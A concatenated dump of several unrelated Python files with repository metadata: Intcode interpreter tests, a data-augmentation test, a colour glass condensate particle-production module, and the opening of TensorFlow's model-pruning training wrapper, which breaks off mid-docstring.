def test_from_text(): # pylint: disable=C0116
values = [0, 1, 2, 0, 99]
program = intcode.IntCodeProgram.from_text("0,1,2,0,99")
assert program.instruction_pointer == 0
assert program.memory == values
program2 = intcode.IntCodeProgram.from_text("0, 1, 2, 0, 99")
assert program2.instruction_pointer == 0
assert program2.memory == values
program3 = intcode.IntCodeProgram.from_text(" 0, 1 , 2 , 0, 99 ")
assert program3.instruction_pointer == 0
assert program3.memory == values
def test_execute_add(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1, 1, 2, 0, 99])
output = program.execute()
assert output == 3
assert program.instruction_pointer == 4
def test_execute_mul(): # pylint: disable=C0116
program = intcode.IntCodeProgram([2, 1, 2, 0, 99])
output = program.execute()
assert output == 2
assert program.instruction_pointer == 4
def test_execute_input(): # pylint: disable=C0116
values = [3, 0, 99]
program = intcode.IntCodeProgram(values, user_input=[77])
output = program.execute()
assert program.instruction_pointer == 2
assert program.memory[0] == 77
assert output == 77
program2 = intcode.IntCodeProgram(values, user_input=77)
output2 = program2.execute()
assert program2.instruction_pointer == 2
assert program2.memory[0] == 77
assert output2 == 77
def test_multiple_input(): # pylint: disable=C0116
values = [3, 0, 3, 1, 99]
program = intcode.IntCodeProgram(values, user_input=[1, 2])
output = program.execute()
assert program.instruction_pointer == 4
assert program.memory[0] == 1
assert program.memory[1] == 2
assert output == 1
program2 = intcode.IntCodeProgram(values, user_input=1)
program2.provide_input(2)
output2 = program2.execute()
assert program2.instruction_pointer == 4
assert program2.memory[0] == 1
assert program2.memory[1] == 2
assert output2 == 1
def test_execute_output(): # pylint: disable=C0116
program = intcode.IntCodeProgram([4, 0, 99])
output = program.execute()
assert program.instruction_pointer == 2
assert output == 4
assert len(program.output) == 1
assert 4 in program.output
def test_execute_output_immediate_mode(): # pylint: disable=C0116
program = intcode.IntCodeProgram([104, 50, 99])
output = program.execute()
assert program.instruction_pointer == 2
assert output == 104
assert len(program.output) == 1
assert 50 in program.output
def test_execute_multiple_output(): # pylint: disable=C0116
program = intcode.IntCodeProgram([4, 0, 104, 50, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 4
assert len(program.output) == 2
assert 4 in program.output
assert 50 in program.output
def test_execute_add_immediate_mode(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1101, 50, 60, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 110
def test_execute_add_mixed_modes(): # pylint: disable=C0116
program = intcode.IntCodeProgram([101, 50, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 151
program = intcode.IntCodeProgram([1001, 0, 50, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 1051
def test_execute_mul_immediate_mode(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1102, 5, 6, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 30
def test_execute_mul_mixed_modes(): # pylint: disable=C0116
program = intcode.IntCodeProgram([102, 2, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 204
program = intcode.IntCodeProgram([1002, 0, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 2004
def test_execute_jump_if_true(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1105, 1, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 1105
program = intcode.IntCodeProgram([1105, 0, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 0
def test_execute_jump_if_false(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1106, 1, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 0
program = intcode.IntCodeProgram([1106, 0, 7, 1102, 0, 0, 0, 99])
output = program.execute()
assert program.instruction_pointer == 7
assert output == 1106
def test_execute_less_than(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1107, 1, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 1
program = intcode.IntCodeProgram([1107, 2, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
program = intcode.IntCodeProgram([1107, 2, 1, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
def test_execute_equals(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1108, 1, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
program = intcode.IntCodeProgram([1108, 2, 2, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 1
program = intcode.IntCodeProgram([1108, 2, 1, 0, 99])
output = program.execute()
assert program.instruction_pointer == 4
assert output == 0
def test_step(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1108, 1, 2, 0, 1108, 2, 2, 0, 1108, 2, 1, 0, 99])
program.step()
assert not program.has_halted
assert program.instruction_pointer == 4
program.step()
assert not program.has_halted
assert program.instruction_pointer == 8
program.step()
assert not program.has_halted
assert program.instruction_pointer == 12
program.step()
assert program.has_halted
assert program.instruction_pointer == 12
def test_step_without_input_is_no_op(): # pylint: disable=C0116
program = intcode.IntCodeProgram([3, 1, 99])
program.step()
assert program.instruction_pointer == 0
assert not program.has_halted
program.provide_input(103)
program.step()
assert program.instruction_pointer == 2
assert not program.has_halted
program.step()
assert program.instruction_pointer == 2
assert program.has_halted
def test_execute_will_return_early_if_waiting_for_input(): # pylint: disable=C0116
program = intcode.IntCodeProgram([3, 1, 99])
program.execute()
assert not program.has_halted
assert program.instruction_pointer == 0
program.provide_input(103)
program.execute()
assert program.instruction_pointer == 2
assert program.has_halted
def test_update_relative_base(): # pylint: disable=C0116
program = intcode.IntCodeProgram([201, 2, 1, 17, 109, 17, 2201, 0, 0, 19, 99])
program.execute()
assert program.instruction_pointer == 10
assert program.has_halted
assert program._relative_base == 17 # pylint: disable=W0212
def test_increased_available_memory(): # pylint: disable=C0116
program = intcode.IntCodeProgram([1101, 1, 2, 17, 99])
program.execute()
assert len(program.memory) == 18
assert program.instruction_pointer == 4
assert program.has_halted
def test_reddit(): # pylint: disable=C0116
program = intcode.IntCodeProgram([109, 1, 203, 2, 204, 2, 99])
program.provide_input(77)
program.execute()
print(program)
print(program.output)
if __name__ == "__main__":
test_reddit()
| 31.30916
| 85
| 0.720224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 644
| 0.078508
|
b16cd2c50420d1e6d132def2948468675ae9b60d
| 720
|
py
|
Python
|
tests/test_DataAugmenterExternally.py
|
AlexKay28/zarnitsa
|
c7e93423dcc1f000849f8c1e1f685e8a91b90f9c
|
[
"Apache-2.0"
] | 8
|
2021-07-19T18:25:03.000Z
|
2021-10-05T15:25:20.000Z
|
tests/test_DataAugmenterExternally.py
|
AlexKay28/zarnitsa
|
c7e93423dcc1f000849f8c1e1f685e8a91b90f9c
|
[
"Apache-2.0"
] | 22
|
2021-07-26T19:13:32.000Z
|
2021-10-09T18:56:07.000Z
|
tests/test_DataAugmenterExternally.py
|
AlexKay28/zarnitsa
|
c7e93423dcc1f000849f8c1e1f685e8a91b90f9c
|
[
"Apache-2.0"
] | 1
|
2021-08-10T12:24:00.000Z
|
2021-08-10T12:24:00.000Z
|
import os
import sys
import pytest
import numpy as np
import pandas as pd
from scipy.stats import ks_2samp
sys.path.append("zarnitsa/")
from zarnitsa.stats import DataAugmenterExternally
N_TO_CHECK = 500
SIG = 0.5
@pytest.fixture
def dae():
return DataAugmenterExternally()
@pytest.fixture
def normal_data():
return pd.Series(np.random.normal(0, SIG * 3, size=N_TO_CHECK), dtype="float64")
def test_augment_column_permute(dae, normal_data):
"""
Augment column with normal distribution
"""
normal_data_aug = dae.augment_distrib_random(
aug_type="normal", size=N_TO_CHECK, loc=0, scale=SIG * 3
)
assert ks_2samp(normal_data, normal_data_aug).pvalue > 0.01, "KS criteria"
| 20
| 84
| 0.730556
| 0
| 0
| 0
| 0
| 182
| 0.252778
| 0
| 0
| 96
| 0.133333
|
b16d517f951d0f5516bebdb100e3d55e1e838a34
| 22,314
|
py
|
Python
|
cgc/Collision.py
|
Jfeatherstone/ColorGlass
|
f242541df614a8eea97c43d3480c779e92660ebb
|
[
"MIT"
] | null | null | null |
cgc/Collision.py
|
Jfeatherstone/ColorGlass
|
f242541df614a8eea97c43d3480c779e92660ebb
|
[
"MIT"
] | null | null | null |
cgc/Collision.py
|
Jfeatherstone/ColorGlass
|
f242541df614a8eea97c43d3480c779e92660ebb
|
[
"MIT"
] | null | null | null |
from .Wavefunction import Wavefunction
import numpy as np
from scipy.fft import ifft2, fft2
import numba
CACHE_OPTIMIZATIONS = True
class Collision():
targetWavefunction = None # Implements wilson line
incidentWavefunction = None # Doesn't (have to) implement wilson line
_omega = None
_omegaFFT = None
_particlesProduced = None
_particlesProducedDeriv = None
_momentaMagSquared = None
_momentaComponents = None
_thetaInFourierSpace = None
_momentaBins = None
_fourierHarmonics = None # This will be initialized as an empty dict to store harmonics (see __init__)
_omegaExists = False
_omegaFFTExists = False
_momentaComponentsExist = False
_particlesProducedExists = False
_particlesProducedDerivExists = False
_momentaBinsExists = False
def __init__(self, wavefunction1: Wavefunction, wavefunction2: Wavefunction):
r"""
Initialize a collision with two wavefunctions, presumably a nucleus and a proton. One must implement
the wilson line, though the order of the arguments does not matter.
In the case that both wavefunctions implement the wilson line, the first (wavefunction1) will be used as such.
In the case that neither implement the wilson line, an exception will be raised.
Parameters
----------
wavefunction1 : Wavefunction (or child)
The first wavefunction
wavefunction2 : Wavefunction (or child)
The second wavefunction
"""
# Make sure that at least one has a wilson line
wilsonLineExists1 = callable(getattr(wavefunction1, "wilsonLine", None))
wilsonLineExists2 = callable(getattr(wavefunction2, "wilsonLine", None))
if not wilsonLineExists1 and not wilsonLineExists2:
raise Exception("Neither of the wavefunctions passed to Collision(Wavefunction, Wavefunction) implement the wilsonLine() method; at least one is required to.")
if wilsonLineExists1 and not wilsonLineExists2:
self.targetWavefunction = wavefunction1
self.incidentWavefunction = wavefunction2
elif wilsonLineExists2 and not wilsonLineExists1:
self.targetWavefunction = wavefunction2
self.incidentWavefunction = wavefunction1
else:
self.targetWavefunction = wavefunction1
self.incidentWavefunction = wavefunction2
# Make sure that both use the same number of colors
if self.targetWavefunction.gluonDOF != self.incidentWavefunction.gluonDOF:
raise Exception(f"Wavefunctions implement different gluon degrees of freedom (number of color charges): {self.incidentWavefunction.gluonDOF} vs. {self.targetWavefunction.gluonDOF}")
# Probably some other checks that need to be done to make sure the two wavefunctions are compatable, but this is fine for now
# Carry over some variables so we don't have to call through the wavefunctions so much
self.N = self.targetWavefunction.N
self.length = self.targetWavefunction.length
self.gluonDOF = self.targetWavefunction.gluonDOF
self.delta = self.targetWavefunction.delta
self.delta2 = self.targetWavefunction.delta2
#print(self.targetWavefunction)
#print(self.incidentWavefunction)
# Variables to do with binning the momenta later on
self.binSize = 4*np.pi/self.length
self.kMax = 2/self.delta
self.numBins = int(self.kMax/self.binSize)
# This has to be initialized as an empty dict within the constructor
# because otherwise it can retain information across separate objects
# (no idea how, but this fixes it)
self._fourierHarmonics = {}
def omega(self, forceCalculate=False, verbose=0):
r"""
Calculate the field omega at each point on the lattice.
If the field already exists, it is simply returned and no calculation is done.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
omega : array(N, N, 2, 2, `colorCharges`**2 - 1)
"""
if self._omegaExists and not forceCalculate:
return self._omega
self.incidentWavefunction.gaugeField(verbose=verbose)
self.targetWavefunction.adjointWilsonLine(verbose=verbose)
if verbose > 0:
print(f'Calculating {type(self).__name__} omega' + '.'*10, end='')
self._omega = _calculateOmegaOpt(self.N, self.gluonDOF, self.delta, self.incidentWavefunction.gaugeField(), self.targetWavefunction.adjointWilsonLine())
self._omegaExists = True
if verbose > 0:
print('finished!')
return self._omega
def omegaFFT(self, forceCalculate=False, verbose=0):
r"""
Compute the fourier transform of the field omega on the lattice.
If the fft of the field already exists, it is simply returned and no calculation is done.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
omegaFFT : array(N, N, 2, 2, `colorCharges`**2 - 1)
"""
if self._omegaFFTExists and not forceCalculate:
return self._omegaFFT
# Make sure omega exists
self.omega(verbose=verbose)
if verbose > 0:
print(f'Calculating {type(self).__name__} omega fourier transform' + '.'*10, end='')
# We want to do the normalization explicitly, but scipy doesn't offer no
# normalization as an option, so we just set it to be the opposite of whatever
# we are doing (forward for ifft, backward for fft)
# (we had some issues with scipy changing its default mode)
self._omegaFFT = self.delta2 * fft2(self._omega, axes=(0,1), norm='backward')
self._omegaFFTExists = True
if verbose > 0:
print('finished!')
return self._omegaFFT
def momentaBins(self, forceCalculate=False, verbose=0):
r"""
Compute the range of momenta at which particles will be created based on the dimensions of the lattice.
The exact values are:
- \( k_{max} = 2 / \Delta\)
- \( w_k = 4 \pi / L \)
If the bins already exist, they are simply returned and no calculation is done.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
momentaBins : array(numBins = L / (delta 2 pi))
"""
if self._momentaBinsExists and not forceCalculate:
return self._momentaBins
if verbose > 0:
print(f'Calculating {type(self).__name__} momentum bins' + '.'*10, end='')
self._momentaBins = [i*self.binSize for i in range(self.numBins)]
self._momentaBinsExists = True
if verbose > 0:
print('finished!')
return self._momentaBins
def momentaComponents(self, forceCalculate=False, verbose=0):
r"""
Compute the components of the momentum at each point on the lattice, according to:
$$ (k_x, k_y) = \frac{2}{\Delta} \left( \sin\left( \frac{\pi i}{N} \right), \sin\left( \frac{\pi j}{N} \right) \right) $$
where \(i\) and \(j\) index the \(x\) and \(y\) directions in real space, respectively.
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
momentaComponents : array(N, N, 2)
"""
if self._momentaComponentsExist and not forceCalculate:
return self._momentaComponents
if verbose > 0:
print(f'Calculating {type(self).__name__} momentum components' + '.'*10, end='')
self._momentaComponents, self._thetaInFourierSpace = _calculateMomentaOpt(self.N, self.delta)
self._momentaMagSquared = np.linalg.norm(self._momentaComponents, axis=2)**2
self._momentaComponentsExist = True
if verbose > 0:
print('finished!')
return self._momentaComponents
def momentaMagnitudeSquared(self, forceCalculate=False, verbose=0):
r"""
Compute the magnitude of the momentum at each point on the lattice, according to:
$$ |k| = \sqrt{k_x^2 + k_y^2} $$
$$ (k_x, k_y) = \frac{2}{\Delta} \left( \sin\left( \frac{\pi i}{N} \right), \sin\left( \frac{\pi j}{N} \right) \right) $$
where \(i\) and \(j\) index the \(x\) and \(y\) directions in real space, respectively.
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
momentaComponents : array(N, N)
"""
if self._momentaComponentsExist and not forceCalculate:
return self._momentaMagSquared
if verbose > 0:
print(f'Calculating {type(self).__name__} momenta magnitude squared' + '.'*10, end='')
self._momentaComponents, self._thetaInFourierSpace = _calculateMomentaOpt(self.N, self.delta)
self._momentaMagSquared = np.linalg.norm(self._momentaComponents, axis=2)**2
self._momentaComponentsExist = True
if verbose > 0:
print('finished!')
return self._momentaMagSquared
def particlesProducedDeriv(self, forceCalculate=False, verbose=0):
r"""
Compute the derivative of particles produced (\( \frac{d^2 N}{d^2 k} \)) at each point on the lattice
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
particlesProducedDeriv : array(N, N)
"""
if self._particlesProducedDerivExists and not forceCalculate:
return self._particlesProducedDeriv
# Make sure these quantities exist
self.omegaFFT(verbose=verbose)
self.momentaMagnitudeSquared(verbose=verbose) # This also calculates thetaInFourierSpace and momentaComponents
if verbose > 0:
print(f'Calculating {type(self).__name__} derivative of particles produced' + '.'*10, end='')
self._particlesProducedDeriv = _calculateParticlesProducedDerivOpt(self.N, self.gluonDOF, self._momentaMagSquared, self._omegaFFT)
if verbose > 0:
print('finished!')
self._particlesProducedDerivExists = True
return self._particlesProducedDeriv
def particlesProduced(self, forceCalculate=False, verbose=0):
r"""
Compute the number of particles produced \(N(|k|)\) as a function of momentum. Note that this
is technically the zeroth fourier harmonic, so this actually just calls the
cgc.Collision.fourierHarmonic() function.
The particles are binned according to cgc.Collision.momentaBins().
Most likely will be plotted against cgc.Collision.momentaBins().
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
particlesProduced : array(numBins = L / (delta 2 pi))
"""
# This one is strictly real, so we should make sure that is updated
self._fourierHarmonics[0] = np.real(self.fourierHarmonic(0, forceCalculate, verbose))
return self._fourierHarmonics[0]
def fourierHarmonic(self, harmonic: int, forceCalculate=False, verbose=0):
r"""
Calculate the fourier harmonic of the particle production as:
$$ v_n = \frac{ \sum_{(i,j)\in [k, k+ \Delta k]} |k| \frac{d^2 N}{d^2 k} e^{i n \theta }} { \sum_{(i,j)\in [k, k+ \Delta k]} |k| } $$
If the calculation has already been done, the result is simply returned and is not repeated.
Parameters
----------
harmonic : int
The fourier harmonic to calculate. All odd harmonics should be zero, and the zeroth harmonic
will be equal to cgc.Collision.particlesProduced()
forceCalculate : bool (default=False)
If the quantity has previously been calculated, the calculation will not be done
again unless this argument is set to True.
verbose : int (default=0)
How much output should be printed as calculations are done. Options are 0, 1, or 2.
Returns
-------
particlesProduced : array(numBins = L / (delta 2 pi))
"""
# First, see if we have already calculated this harmonic
if harmonic in self._fourierHarmonics.keys() and not forceCalculate:
return self._fourierHarmonics[harmonic]
# For actually calculating the harmonic, we first have to make sure we've calculated
# the derivative, dN/d^2k
# This makes sure that _momentaMagSquared, _thetaInFourierSpace and _particlesProducedDeriv
# all exist
self.particlesProducedDeriv(verbose=verbose)
if verbose > 0:
print(f'Calculating {type(self).__name__} fourier harmonic: {harmonic}' + '.'*10, end='')
# Drop all of our arrays into long 1D structure, since we will want to bin them
vectorizedParticleDerivs = np.reshape(self._particlesProducedDeriv, [self.N*self.N])
vectorizedTheta = np.reshape(self._thetaInFourierSpace, [self.N*self.N])
vectorizedMomentaMag = np.reshape(np.sqrt(self._momentaMagSquared), [self.N*self.N])
# The number of particles that are produced in each bin
# These bins are actually just thin rings in momentum space
self._fourierHarmonics[harmonic] = np.zeros(self.numBins, dtype='complex')
# The bin sizes/bounds are calculated for elsewhere
self.momentaBins()
# Ideally, these rings should be only have a thickness dk (infinitesimal)
# but since we have a discrete lattice, we weight the particles by their momentum
# (which may slightly vary) and then properly normalize
# Go through each bin and calculate (for all points in that bin):
# 1. Sum over |k| * dN/d^2k * exp(i * harmonic * theta)
# 2. Sum over |k|
# 3. Divide 1./2.
for i in range(self.numBins):
# Find which places on the lattice fall into this particular momentum bin
# Note the use of element-wise (or bitwise) and, "&"
particleDerivsInRing = vectorizedParticleDerivs[(vectorizedMomentaMag < self.binSize*(i+1)) & (vectorizedMomentaMag > self.binSize*i)]
momentaMagInRing = vectorizedMomentaMag[(vectorizedMomentaMag < self.binSize*(i+1)) & (vectorizedMomentaMag > self.binSize*i)]
thetaInRing = vectorizedTheta[(vectorizedMomentaMag < self.binSize*(i+1)) & (vectorizedMomentaMag > self.binSize*i)]
# Note that multiplication is done element-wise by default
numeratorSum = np.sum(particleDerivsInRing * momentaMagInRing * np.exp(1.j * harmonic * thetaInRing))
denominatorSum = np.sum(momentaMagInRing)
self._fourierHarmonics[harmonic][i] = numeratorSum / denominatorSum
if verbose > 0:
print('finished!')
return self._fourierHarmonics[harmonic]
# Using custom functions within other jitted functions can cause some issues,
# so we define the signatures explicitly for these two functions.
@numba.jit((numba.float64[:,:], numba.int64, numba.int64, numba.int64, numba.float64), nopython=True, cache=CACHE_OPTIMIZATIONS)
def _x_deriv(matrix, i, j, N, delta):
return (matrix[i,(j+1)%N] - matrix[i,j-1]) / (2 * delta)
@numba.jit((numba.float64[:,:], numba.int64, numba.int64, numba.int64, numba.float64), nopython=True, cache=CACHE_OPTIMIZATIONS)
def _y_deriv(matrix, i, j, N, delta):
return (matrix[(i+1)%N,j] - matrix[i-1,j]) / (2 * delta)
# Because of the same issue described above, we can't cache this function
# This function gives a warning because numba only experimentally supports
# treating functions as objects (the list derivs).
@numba.jit(nopython=True)
def _calculateOmegaOpt(N, gluonDOF, delta, incidentGaugeField, targetAdjointWilsonLine):
"""
Calculate the field omega at each point on the lattice.
If the field already exists, it is simply returned and no calculation is done.
Returns
-------
numpy.array : shape=(N, N, 2, 2, `colorCharges`**2 - 1)
"""
# 2,2 is for the 2 dimensions, x and y
omega = np.zeros((N, N, 2, 2, gluonDOF), dtype='complex') # 2 is for two dimensions, x and y
derivs = [_x_deriv, _y_deriv]
for i in range(N):
for j in range(N):
for k in range(gluonDOF):
for l in range(2): # 2 is number of dimensions
for n in range(2): # 2 is number of dimensions
omega[i,j,l,n,k] = np.sum(np.array([derivs[l](incidentGaugeField[:,:,m], i, j, N, delta) * derivs[n](targetAdjointWilsonLine[:,:,k,m], i, j, N, delta) for m in range(gluonDOF)]))
return omega
@numba.jit(nopython=True, cache=CACHE_OPTIMIZATIONS)
def _calculateMomentaOpt(N, delta):
"""
Optimized (via numba) function to calculated the position (momentum) in Fourier space of each point
Parameters
----------
N : int
Size of the lattice
delta : double
Spacing between each point
Returns
-------
(momentaComponents, theta)
momentaComponents : array(N, N, 2)
x and y components of the momentum at each point
theta : array(N, N)
Relationship between x and y components at each point, or atan2(k_y, k_x)
"""
momentaComponents = np.zeros((N, N, 2))
theta = np.zeros((N, N))
for i in range(N):
for j in range(N):
# Note that these components are of the form:
# k_x = 2/a sin(k_x' a / 2)
# Though the argument of the sin is simplified a bit
momentaComponents[i,j] = [2/delta * np.sin(np.pi*i/N) * np.sign(np.sin(2*np.pi*i/N)), 2/delta * np.sin(np.pi*j/N) * np.sign(np.sin(2*np.pi*j/N))]
theta[i,j] = np.arctan2(momentaComponents[i,j,1], momentaComponents[i,j,0])
return momentaComponents, theta
@numba.jit(nopython=True, cache=CACHE_OPTIMIZATIONS)
def _calculateParticlesProducedDerivOpt(N, gluonDOF, momentaMagSquared, omegaFFT):
"""
Optimized (via numba) function to calculate dN/d^2k
Parameters
----------
N : int
The system size
gluonDOF : int
The number of gluon degrees of freedom ((possible color charges)^2 - 1)
momentaMagSquared : array(N, N)
The magnitude of the momentum at each point, likely calculated (in part) with _calculateMomentaOpt()
omegaFFT : array(2, 2, gluonDOF, N, N)
Previously calculated omega array
Returns
-------
particleProduction : array(N, N)
The number of particles produced at each point on the momentum lattice
"""
# Where we will calculate dN/d^2k
particleProduction = np.zeros((N,N))
# # 2D Levi-Cevita symbol
LCS = np.array([[0,1],[-1,0]])
# # 2D Delta function
KDF = np.array([[1,0],[0,1]])
# Note that unlike in the rest of the code, i and j *do not* refer to the
# spacial indices here: x and y do (too many indices... :/ )
for y in range(N):
for x in range(N):
# To prevent any divide by zero errors
if momentaMagSquared[y,x] == 0:
continue
# All of these 2s are for our two dimensions, x and y
for i in range(2):
for j in range(2):
for l in range(2):
for m in range(2):
for a in range(gluonDOF):
particleProduction[y,x] += np.real(2/(2*np.pi)**3 / momentaMagSquared[y,x] * (
(KDF[i,j]*KDF[l,m] + LCS[i,j]*LCS[l,m])) * (
omegaFFT[y,x,i,j,a] * np.conj(omegaFFT[y,x,l,m,a])))
return particleProduction
| 37.314381
| 202
| 0.63691
| 17,357
| 0.777852
| 0
| 0
| 4,464
| 0.200054
| 0
| 0
| 12,468
| 0.558752
|
b1716479f1c26f49cf955c116938436d2e898588
| 21
|
py
|
Python
|
fastagram/tags/models/__init__.py
|
dobestan/fastagram
|
8c57401512d7621890a4f160d4b27c6e0d3ab326
|
[
"MIT"
] | 1
|
2016-03-27T10:36:01.000Z
|
2016-03-27T10:36:01.000Z
|
fastagram/tags/models/__init__.py
|
dobestan/django-101-fastagram
|
8c57401512d7621890a4f160d4b27c6e0d3ab326
|
[
"MIT"
] | 3
|
2016-03-25T05:32:39.000Z
|
2016-03-28T04:59:17.000Z
|
fastagram/tags/models/__init__.py
|
dobestan/django-101-fastagram
|
8c57401512d7621890a4f160d4b27c6e0d3ab326
|
[
"MIT"
] | 1
|
2016-03-28T16:35:36.000Z
|
2016-03-28T16:35:36.000Z
|
from .tag import Tag
| 10.5
| 20
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b1724ba73246edc325129a0b1a56c982075f8024
| 8,346
|
py
|
Python
|
tensorflow/contrib/model_pruning/python/learning.py
|
uve/tensorflow
|
e08079463bf43e5963acc41da1f57e95603f8080
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/model_pruning/python/learning.py
|
uve/tensorflow
|
e08079463bf43e5963acc41da1f57e95603f8080
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/contrib/model_pruning/python/learning.py
|
uve/tensorflow
|
e08079463bf43e5963acc41da1f57e95603f8080
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Wrapper around tf-slim's training code contrib/slim/python/slim/learning.py
to support training of pruned models
*******************************************************************
* A simple working training script with support for model pruning *
*******************************************************************
# Load data and create the model:
images, labels = LoadData(...)
predictions = MyModel(images)
# Define the loss:
slim.losses.log_loss(predictions, labels)
total_loss = slim.losses.get_total_loss()
# Define the optimizer:
optimizer = tf.compat.v1.train.MomentumOptimizer(FLAGS.learning_rate,
FLAGS.momentum)
# Create the train_op
train_op = slim.learning.create_train_op(total_loss, optimizer)
# Parse pruning hyperparameters
pruning_hparams = pruning.get_pruning_hparams().parse(FLAGS.pruning_hparams)
# Create a pruning object using the pruning_hparams
p = pruning.Pruning(pruning_hparams)
# Add mask update ops to the graph
mask_update_op = p.conditional_mask_update_op()
# Run training.
learning.train(train_op,
my_log_dir,
mask_update_op)
see contrib/slim/python/slim/learning.py for additional examples
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import slim as _slim
_USE_DEFAULT = 0
train_step = _slim.learning.train_step
def train(train_op,
logdir,
mask_update_op,
train_step_fn=train_step,
train_step_kwargs=_USE_DEFAULT,
log_every_n_steps=1,
graph=None,
master='',
is_chief=True,
global_step=None,
number_of_steps=None,
init_op=_USE_DEFAULT,
init_feed_dict=None,
local_init_op=_USE_DEFAULT,
init_fn=None,
ready_op=_USE_DEFAULT,
summary_op=_USE_DEFAULT,
save_summaries_secs=600,
summary_writer=_USE_DEFAULT,
startup_delay_steps=0,
saver=None,
save_interval_secs=600,
sync_optimizer=None,
session_config=None,
trace_every_n_steps=None):
"""Wrapper around tf-slim's train function.
Runs a training loop using a TensorFlow supervisor.
When the sync_optimizer is supplied, gradient updates are applied
synchronously. Otherwise, gradient updates are applied asynchronous.
Args:
train_op: A `Tensor` that, when executed, will apply the gradients and
return the loss value.
logdir: The directory where training logs are written to. If None, model
checkpoints and summaries will not be written.
mask_update_op: Operation that upon execution updates the weight masks and
thresholds.
train_step_fn: The function to call in order to execute a single gradient
step. The function must have take exactly four arguments: the current
session, the `train_op` `Tensor`, a global step `Tensor` and a
dictionary.
train_step_kwargs: A dictionary which is passed to the `train_step_fn`. By
default, two `Boolean`, scalar ops called "should_stop" and "should_log"
are provided.
log_every_n_steps: The frequency, in terms of global steps, that the loss
and global step and logged.
graph: The graph to pass to the supervisor. If no graph is supplied the
default graph is used.
master: The address of the tensorflow master.
is_chief: Specifies whether or not the training is being run by the primary
replica during replica training.
global_step: The `Tensor` representing the global step. If left as `None`,
then slim.variables.get_or_create_global_step() is used.
number_of_steps: The max number of gradient steps to take during training,
as measured by 'global_step': training will stop if global_step is greater
than 'number_of_steps'. If the value is left as None, training proceeds
indefinitely.
init_op: The initialization operation. If left to its default value, then
the session is initialized by calling
`tf.compat.v1.global_variables_initializer()`.
init_feed_dict: A feed dictionary to use when executing the `init_op`.
local_init_op: The local initialization operation. If left to its default
value, then the session is initialized by calling
`tf.compat.v1.local_variables_initializer()` and
`tf.compat.v1.tables_initializer()`.
init_fn: An optional callable to be executed after `init_op` is called. The
callable must accept one argument, the session being initialized.
ready_op: Operation to check if the model is ready to use. If left to its
default value, then the session checks for readiness by calling
`tf.compat.v1.report_uninitialized_variables()`.
summary_op: The summary operation.
save_summaries_secs: How often, in seconds, to save summaries.
summary_writer: `SummaryWriter` to use. Can be `None` to indicate that no
summaries should be written. If unset, we create a SummaryWriter.
startup_delay_steps: The number of steps to wait for before beginning. Note
that this must be 0 if a sync_optimizer is supplied.
